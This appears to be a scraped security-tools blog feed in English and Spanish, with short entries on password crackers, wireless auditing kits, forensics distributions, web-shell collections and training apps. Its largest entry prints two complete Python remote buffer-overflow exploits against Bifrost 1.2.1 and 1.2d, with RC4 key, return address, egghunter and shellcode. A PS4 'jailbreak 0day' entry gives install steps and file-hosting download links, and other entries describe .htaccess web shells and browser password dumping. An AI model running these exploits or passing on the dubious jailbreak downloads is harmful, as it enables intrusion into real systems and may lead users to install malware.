↧
OWASP Xenotix XSS Exploit Framework v4.5
↧
[Hashcat v0.46] Multi-Threaded Password Hash Cracking Tool
hashcat claims to be the world’s fastest CPU-based password recovery tool, while not as fast as GPU powered hash brute forcing (like CUDA-Multiforcer), it is still pretty fast.
hashcat was written somewhere in the middle of 2009. Yes, there were already close-to-perfect working tools supporting rule-based attacks like “PasswordsPro”, “John The Ripper”. However for some unknown reason, both of them did not support multi-threading. That was the only reason to write hashcat: To make use of the multiple cores of modern CPUs.
Granted, that was not 100% correct. John the Ripper already supported MPI using a patch, but at that time it worked only for Brute-Force attack. There was no solution available to crack plain MD5 which supports MPI using rule-based attacks.
Hashcat, from its first version, v0.01, was called “atomcrack”. This version was very poor, but at least the MD5 kernel was written in assembler utilizing SSE2 instructions and of course it was multi-threaded. It was a simple dictionary cracker, nothing more. But it was fast. Really fast. Some guys from the scene become interested in it and after one week there were around 10 beta testers. Everything worked fine and so requests for more algorithm types, a rule-engine for mutation of dictionaries, a windows version and different attack modes were added. These developments took around half a year, and were completely non-public.
Features
- Multi-Threaded
- Multi-Hash (up to 24 million hashes)
- Multi-OS (Linux, Windows and OSX native binaries)
- Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …)
- SSE2, AVX and XOP accelerated
- All Attack-Modes except Brute-Force and Permutation can be extended by rules
- Very fast Rule-engine
- Rules compatible with JTR and PasswordsPro
- Possible to resume or limit session
- Automatically recognizes recovered hashes from outfile at startup
- Can automatically generate random rules
- Load saltlist from external file and then use them in a Brute-Force Attack variant
- Able to work in an distributed environment
- Specify multiple wordlists or multiple directories of wordlists
- Number of threads can be configured
- Threads run on lowest priority
- Supports hex-charset
- Supports hex-salt
- 80+ Algorithms implemented with performance in mind
Detailed documentation and command line switches can be found here – hashcat.
↧
↧
[OMENS v1.17] The framework for distributing Actionable Intelligence
OMENS (Object Monitor for Enhanced Network Security) was born out of the intrusion (and intrusion attempts) analysis that I have been doing over many years. I consistently run into intrusion attempts that existing IDS systems have difficulty detecting. OMENS is my attempt to better detect (and understand) these blind spots in existing systems.
OMENS uses two primary methods to determine hostile activity. Scanning for hostile activity through signature comparisons, and base-lining to determine if any system changes have taken place.
OMENS is initially targeted at defending web servers, because the author of OMENS is most familiar with web based intrusions. However, the concepts employed by OMENS could be used in many other circumstances.
OMENS starts with scanning the web server log file for hostile activity. If it sees anything that matches the hostile signature database, it will report that activity in a report or via syslog.
OMENS also baselines the web server’s (web root) file system. If any changes are made in the files, those files are then scanned for hostile signatures, and any findings are again reported via report or syslog. One unique feature of OMENS is that it will also scan any modified or new files for obfuscated code. A common indicator of hostile files is that they contain obfuscated code. Obfuscation is commonly used to prevent detection. To my knowledge no existing scanner other than OMENS looks for this important indicator.
OMENS can also check the Windows Registry for hostile keys.
Download OMENS v1.17
↧
[ipset_list] ipset set listing wrapper script
Features:
- Calculate sum of set members (and match on that count).
- List only members of a specified set.
- Choose a delimiter character for separating members.
- Show only sets containing a specific (glob matching) header.
- Arithmetic comparison on headers with an integer value.
- Match members using a globbing or regex pattern.
- Suppress listing of (glob matching) sets.
- Suppress listing of (glob matching) headers.
- Suppress listing of members matching a glob or regex pattern.
- Suppress listing of members options.
- Calculate the total size in memory of all matching sets.
- Calculate the amount of matching, excluded and traversed sets.
- Colorize the output.
- Operate on a single, selected, or all sets.
- Programmable completion is included to make usage easier and faster.
↧
[iptables-bash_completion] Programmable completion code (bash) for ip[6]tables
This is the programmable completion specification (compspec) for the iptables program (netfilter.org).
- Interactive completion for ip[6]tables.
- This completion specification follows the logic of iptables and will only show commands and options, when they are available for the current context. Providing some kind of interactive help.
- Show and complete matches, targets and builtin and/or user-defined chains.
- Dynamically retrieve, show and complete: set names, services (port-ranges), protocols, active interfaces, cpu numbers, routing realms, user and group names, NFLOG logging groups, tc classes, nfacct names, nfct timeout policy names, genre names of the osf match.
- Show and complete hostnames, ip/network/mac addresses.
- Show and complete various arguments for matches and targets (those which are in any way predictable).
- Some values entered by the user are checked for validity and completion will not continue after an invalid input.
- Environment variables allow to modify completion behaviour.
↧
↧
[Tundeep v0.2a] Layer 2 VPN/Injection tool
Tundeep is a layer 2 VPN/injection tool that resides [almost] entirely in user space on the victim aside from the pcap requirement. This can be handled via a silent install however. The tool will build on Linux and Windows victims. Windows compilation is achieved using Cygwin. The attacker must be a Linux machine however as kernel TUN/TAP support is required. It works just fine on Backtrack/Kali.
The purpose of the tool is to allow an attacker to tunnel through a network at layer 2. A TAP interface will be brought up on the attackers machine for each level of the network allowing direct interaction with hosts on the network segment through a compromised victim.
Changelog:
- IPv6 support (-6, -T)
- Compression support (-C) – must be enabled on both sides
- Better error checking and debugging
- Misc bug fixes and code improvements
- Makefile improvements to detect Cygwin/Linux without manual edits
- README updates
- Added default checksum feature (-K disables) – added overhead, improved reliability.
- Compression support (-C) – must be enabled on both sides
- Better error checking and debugging
- Misc bug fixes and code improvements
- Makefile improvements to detect Cygwin/Linux without manual edits
- README updates
- Added default checksum feature (-K disables) – added overhead, improved reliability.
↧
[pyClamd] Using Clamav with python
↧
[HashTag] Password Hash Type Identification (Identify Hashes)
HashTag.py is a Python script written to parse and identify the password hash type used.
HashTag supports the identification of over 250 hash types along with matching them to over 110 hashcat modes (use the command line switch -hc to output the hashcat modes). It is also able to identify a single hash, parse a single file and identify the hashes within it, or traverse a root directory and all subdirectories for potential hash files and identify any hashes found.
One of the biggest aspects of this tool is the identification of password hashes. The main attributes used to distinguish between hash types are character set (hexadecimal, alphanumeric, etc.), hash length, hash format (e.g. 32 character hash followed by a colon and a salt), and any specific substrings (e.g. ‘$1$’). A lot of password hash strings can’t be identified as one specific hash type based on these attributes. For example, MD5 and NTLM hashes are both 32 character hexadecimal strings. In these cases the author made an exhaustive list of possible types and has the tool output reflect that.
- Identifying a single hash type (-sh)
- Parsing and identifying multiple hashes from a file (-f)
- Traversing subdirectories to locate files which contain hashes and parse/identify them (-d)
HashTag.py {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]↧
[FruityWifi v1.6] the Wireless Network Auditing Tool
FruityWifi is a wireless network auditing tool based in the Wifi Pineapple idea. The application can be installed in any Debian based system. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi).
With the new version, it is possible to install external modules. This functionality gives the user more flexibility and the FruityWifi can be customized. The modules can be added or removed anytime using the on-line repository.
Available modules:
- Hostapd Karma
- URLsnarf
- DNSspoof
- Kismet
- Squid (code injection capabilities)
- SSLstrip (code injection capabilities)
- nmap
- mdk3
- ngrep
- Captive Portal
New modules are being developed continuously and can be installed from the modules page.
Using the installation script all the required dependencies, scripts and setup can be installed, or if you prefer you can download a SD image of Pwnpi 3.0 with FruityWifi v1.6 from the wiki page:
https://github.com/xtr4nge/FruityWifi/wiki/Install
↧
↧
[Chrome Password Dump] Command-line Tool to Recover Login Password from Google Chrome Browser
Chrome Password Dump is the free command-line tool to quickly recover your lost web login passwords from Google Chrome browser.
It automatically detects the default Chrome profile for current user and recovers all the stored web login passwords.
Alternatively you can also specify the custom profile path in case your Chrome user profile is not in standard location. This is very useful in recovering the login passwords from other Chrome based browsers such as Chrome SXS/Canary, CoolNovo, Flock, Comodo Dragon etc.
Command line interface makes it helpful for Penetration Testers& Forensic investigators.
↧
[HTSHELLS] Self contained web shells and other attacks via .htaccess files
Attacks are named in the following fashion, module.attack.htaccess and grouped by attack type in directories. Pick the one you need and copy it to a new file named .htaccess, check the file to see if it needs editing before you upload it. Web shells executes commands from the query parameter c, unless the file states otherwise.
↧
[Lynis v1.3.5] The Unix / Linux auditing, security and hardening Tool
Security and system auditing tool to harden Linux systems (and more)
Lynis is an auditing tool for Unix/Linux. It performs a security scan and determines the hardening state of the machine. Any detected security issues will be provided in the form of a suggestion or warning. Beside security related information it will also scan for general system information, installed packages and possible configuration errors.
This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits.
Security specialists, penetration testers, system auditors, system/network managers.
Examples of audit tests:
- Available authentication methods
- Expired SSL certificates
- Outdated software
- User accounts without password
- Incorrect file permissions
- Configuration errors
- Firewall auditing
Current state:
Stable releases are available, development is active.
System requirements:Background information:Lynis is an audit script written in the common shell scripting language (sh). Therefore it runs on most systems without any adjustments. Packages are created by several maintainers, for easier installation. Still, if one would like to use the latest version, simply download the tarball, extract it to a temporary directory and run the tool.
Supported operating systems- Compatible operating system (see 'Supported operating systems')- Default shell
Tested on:- Arch Linux- CentOS- Debian- Fedora Core- FreeBSD- Gentoo- Knoppix- Linux Mint- Mac OS X- Mandriva- OpenBSD- OpenSolaris- OpenSuSE- Oracle Linux- PcBSD- PCLinuxOS- Red Hat Enterprise Linux (RHEL)- Red Hat derivatives- Slackware- Solaris 10- Ubuntu
↧
[WiFi Password Remover] Wireless (WEP/WPA/WPA2) Password/Profile Removal Software
WiFi Password Remover is the Free software to quickly recover and remove Wireless account passwords stored on your system.
For each recovered Wi-Fi account, it displays following details,
|
| Once recovered, you can either remove single or all of them with just a click. Before proceeding with deletion, you can also take a backup of recovered Wi-Fi password list to HTML/XML/TEXT file.
One of the unique feature of this tool is
that it can recover all type of Wi-Fi passwords including the ones which
are not shown by 'Windows Wireless Manager', thus allowing you to remove all the hidden wireless passwords/profiles also. |
↧
↧
[DEFT] Distribución linux para análisis forense
DEFT es una reputada distribución que recopila herramientas de análisis forense y que alcanza ya su versión 8.
No se enfoca únicamente al típico análisis forense de discos duros, si
no que tendremos la posibilidad también de realizar forenses de red e
incluso de dispositivos móviles. Deft v8 está basada en Ubuntu 12.10, y
posee un kernel versión 3.5.0-30. Como cualquier tipo de livecd actual, se nos ofrece la opción de instalar la distribución en nuestro disco duro.
Dentro del menú principal de la distribución, nos encontramos las siguientes categorías de herramientas incluidas:
 |
| Menú de herramientas de DEFT 8 |
- Analysis - Herramientas de análisis de ficheros de diferentes tipos
- Antimalware - Búsqueda de rootkits, virus, malware, así como PDFs con código malicioso.
- Data recovery - Software para recuperación de ficheros
- Hashing - Scripts que permiten la realización de cálculo de hashes de determinados procesos (SHA1, SHA256, MD5...)
- Imaging - Aplicaciones que podemos utilizar para realizar los clonados y adquisición de imágenes de discos duros u otras fuentes.
- Mobile Forensics - Análisis de Blackberry, Android, iPhone, así como información sobre las típicas bases de datos de dispositivos móviles en SQLite utilizadas por las aplicaciones.
- Network Forensics - Herramientas para procesamiento de información almacenada en capturas de red
- OSINT - Aplicaciones que facilitan la obtención de información asociada a usuarios y su actividad.
- Password recovery - Recuperación de contraseñas de BIOS, ficheros comprimidos, ofimáticos, fuerza bruta, etc.
- Reporting tools - Por último, dentro de esta sección encontraremos herramientas que nos facilitarán las tareas de generación de informes y obtención de evidencias que nos servirán para documentar el análisis forense. Captura de pantalla, recopilación de notas, registro de actividad del escritorio, etc.
Dentro de estas secciones, encontraréis muchísimas herramientas que evitarán tener que recopilarlas por cuenta propia. El listado completo de paquetes lo tenéis en este enlace. De esta versión última 8, todavía no existe un manual, pero podéis echar un vistazo al manual para la versión 7, si bien su uso es bastante simple y cada herramienta lleva su man asociado.
Por último, destacar la inclusión dentro de esta versión 8 de DART 2,
una suite para gestión y respuesta ante incidentes desde sistemas
operativos Windows, que incluye un lanzador de aplicaciones a
herramientas para este sistema operativo.
 |
| Ejecutando DART en sistema operativo Windows |
Podréis descargar la distribución en diferentes formatos (imagen ISO, máquina virtual y versión para pendrives USB, entre otros) teniendo disponibles varios mirrors. Sin duda, una livecd que no debe faltar también en nuestro arsenal de cds/usbs para llevar siempre encima.
↧
[Exploit] Bifrost 1.2.1 and 1.2d - Remote Buffer OverFlow
Bifrost 1.2.1 - Remote Buffer OverFlow
#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys
def rc4crypt(data, key):
x = 0
box = range(256)
for i in range(256):
x = (x + box[i] + ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = []
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
return ''.join(out)
def bif_len(s):
while len(s)<8:
s=s+"00"
return s
def header(s):
a=(s[0]+s[1]).decode("hex")
a+=(s[2]+s[3]).decode("hex")
a+=(s[4]+s[5]).decode("hex")
a+=(s[5]+s[6]).decode("hex")
return a
def random():
a=""
for i in range(0,8):
a+="A"*1000+"|"
return a
def usage():
print "\n\n\t***************************"
print "\t* By : Mohamed Clay *"
print "\t* Bifrost 1.2.1 Exploit *"
print "\t***************************\n"
print "\t Usage : ./bifrost1.2.1 host port"
print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
if len(sys.argv)!=3:
usage()
exit()
HOST=sys.argv[1]
PORT=int(sys.argv[2])
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
#calc.exe shellcode (badchars "\x00")
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"Bifrost 1.2d - Remote Buffer Overflow
#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import threading
import sys
def rc4crypt(data, key):
x = 0
box = range(256)
for i in range(256):
x = (x + box[i] + ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = []
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
return ''.join(out)
def bif_len(s):
while len(s)<8:
s=s+"00"
return s
def header(s):
a=(s[0]+s[1]).decode("hex")
a+=(s[2]+s[3]).decode("hex")
a+=(s[4]+s[5]).decode("hex")
a+=(s[5]+s[6]).decode("hex")
return a
def random():
a=""
for i in range(0,8):
a+="A"*1000+"|"
return a
def exploit():
s.sendall(out)
def usage():
print "\n\n\t***************************"
print "\t* By : Mohamed Clay *"
print "\t* Bifrost 1.2d Exploit *"
print "\t***************************\n"
print "\t Usage : ./bifrost1.2.1 host port"
print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
if len(sys.argv)!=3:
usage()
exit()
HOST=sys.argv[1]
PORT=int(sys.argv[2])
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
#calc.exe shellcode (badchars "\x00")
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:\|C:\|C:\|MA|00000000|BifrosT v1.2d|"
out2=rc4crypt(data2,key)
l=header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2=l+out2
th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"Download Bifrost 1.2d - Remote Buffer Overflow
Download Bifrost 1.2.1 - Remote Buffer OverFlow
↧
[Cansina] Web Content Discovery Application
It takes general available lists of common path and files used by web applications and make URL requests looking back to the server response code. Cansina stores the information in a sqlite database (omitting 404 responses). One for every new url (think this as a kind of projects feature) and the same database for every new payload on the same url.
It aims to be (very) simple and straight to use doing only one thing: Discover content.
The app is far from being finished, probably is poorly coded and I wouldn't recommend it to use in a serious pentesting session.
Features
- Threads (well, processes)
- HTTP/S Proxy support (thanks to requests)
- Data persistance (sqlite3)
- Support for multiextensions list (-e php,asp,aspx,txt...)
- Content inspector (will watch for a specific string inside web page content)
- Skip fake 404 (best as possible)
- Skip by filtering content
- Replacing (for URL fuzzing)
- Reporting tool
- Basic Authentication
↧
[zAnti] Android Network Toolkit
Anti consists of 2 parts: The Anti version itself and extendable plugins. Upcoming updates will add functionality, plugins or vulnerabilities/exploits to Anti
Using Anti is very intuitive - on each run, Anti will map your network, scan for active devices and vulnerabilities, and will display the information accordingly: Green led signals an 'Active device', Yellow led signals "Available ports", and Red led signals "Vulnerability found". Also, each device will have an icon representing the type of the device. When finished scanning, Anti will produce an automatic report specifying which vulnerabilities you have or bad practices used, and how to fix each one of them
↧
↧
[Hack PS4] PS4 Jailbreaking (with OrbisOS 0day)
EXPLOIT DETAILS
OS: Orbis
Console: PlayStation 4
Type: Privilege Escalation/Buffer Overflow (allows to run assigned code)
AUTHOR
Name: x-s4nd3r
URL:http://twitter.com/xs4nd3r (feel free to get him v&)
FILES:
PS4 DevKit:https://depositfiles.com/files/deitivkle
Jailbreak Package (exploit): https://depositfiles.com/files/xwurigoq
***IMPORTANT***** - You need the DAY ONE Update to jailbreak the PS4, otherwise these files will be considered unrecognizable.
GUIDE:
1. Create a folder on your USB storage device. This is where you'll put the exploit.
2. Create a "SANDERPS4" folder. Inside that folder, create another folder named "EXP."
3. Extract the PSORBISEXP.PUP file from the package, and save it in the EXP folder.
4. Make sure your PlayStation 4 is turned off.
5. Connect the USB storage device to your PlayStation 4, and press the power button for at least 7 seconds. The PlayStation 4 will start in Safe Mode.
6. Select "Update System Software."
7. Follow the on-screen instructions to install the jailbreak.
8. If your PlayStation 4 doesn't recognize the jailbreaking file, make sure that the folder and file names are correct.
9. Voila! JAILBROKEN!
↧
20 Herramientas de Monitorización de Ancho de Banda en Linux
Para consola:
- vnstat: se ejecuta como servicio o mediante tareas programadas, su ventaja es que es útil para controlar en tiempo real el tráfico enviado y recibido y también hacerlo en un periodo de tiempo. Una de mis favoritas, está paquetizada en casi todas las distribuciones.
- iptraf: al igual que la anterior es un clásico, se caracteriza por su interfaz ncurses desde el que se configura interactivamente. Ampliamente distribuida.
- iftop: últimamente es una de la que más veo usar. Trata de ser el 'top' de cpu para las conexiones de red. Su interfaz es sencilla y se incluye en la gran mayoría de distribuciones. Otra indispensable.
- bwm-ng: es más simple que otras herramientas similares, su gran ventaja es que además de funcionar en modo interactivo, permite exportar la salida a un archivo CSV o html
- ibmonitor: en concepto es parecida a bwm-ng o vnstat, muestra el tráfico total por interfaz, tanto el enviado como el recibido.
- nload: herramienta interactiva que muestra el consumo acumulado y además dibuja en modo texto gráficas (en ASCII claro).
- dstat: tiene formato similar a los conocidos iostat, vmstat con soporte de colores. Está incluida en múltiples distribuciones.
- tcptrack: aplicación que muestra el consumo por conexión. No está tan extendida como otras. herramientas similares.
- ipband: también orientado a obtener datos por conexión.
- speedometer: más gráficas en ASCII para ver el tráfico en grandes números, permite obtener estadísticas de velocidad en la red.
Con interfaz web:
- vnstati: es la herramienta de vnstat para generar archivos png que poder visualizar vía web. Muy muy sencilla. Como pega, no es dinámica.
- collectd: realmente versátil y potente. Permite medir muchos otros parámetros además de la red con distintos plugins. Funciona en modo cliente/servidor, por lo que puede monitorizar redes de sistemas.
- munin: conceptualmente similar al anterior, permite, mediante plugins, monitorizar varios servicios. También funciona en modo cliente/servidor.
- cacti: archiconocido y muy usado para adquirir datos vía snmp de sistemas remotos. Permite diseñar y crear las gráficas usando su propio interfaz web.
- bandwidthd: pese a que cumple sus funciones de pintar gráficas de consumo de ancho de banda, no permite configurar demasiadas opciones.
- ntopng: versión "ng" del clásico ntop. Personalmente no me gusta la forma de presentar los datos.
- mrtg: otro clásico, permite pintar gráficas obteniendo datos vía snmp.
- orca: pinta gráficas estilo mrtg. Al igual que mrtg, son versiones no adaptadas a estos tiempos modernos.
- bwbar: genera una única barra muy sencilla, incluso más que vnstati, con los datos de entrada y salida.
- Graphite: realmente no es para dibujar gráficas de tráfico, pero permite dibujar gráficas de cualquier tipo de una forma realmente sencilla y bonita. Requiere que se le pasen los datos mediante algún script, por ejemplo, usando alguna herramienta de las vistas en la sección anterior.
↧
[OWASP GoatDroid] Project that will help educate security to application developers Android
OWASP GoatDroid is a fully functional and self-contained training environment for educating developers and testers on Android security. GoatDroid requires minimal dependencies and is ideal for both Android beginners as well as more advanced users. The project currently includes two applications: FourGoats, a location-based social network, and Herd Financial, a mobile banking application. There are also several feature that greatly simplify usage within a training environment or for absolute beginners who want a good introduction to working with the Android platform.As the Android SDK introduces new features, the GoatDroid contributors will strive to implement up-to-date lessons that can educate developers and security testers on new security issues. The project currently provides coverage for most of the OWASP Top 10 Mobile Risks and also includes a bunch of other problems as well. GoatDroid is composed of the following components:
- GUI application used to present information, interact with the SDK and control the web services
- Android applications containing horrifically vulnerable code
- Embedded Jetty web server
- Embedded Derby database
Contributions will always be needed in order to keep this project moving at a pace that can support the seemingly endless new problems to tackle. If you are interested, please contact the project's leaders or send an email to the OWASP Mobile Security Project mailing list. We welcome code contributors, beta testers, new feature suggestions, and feedback always!
↧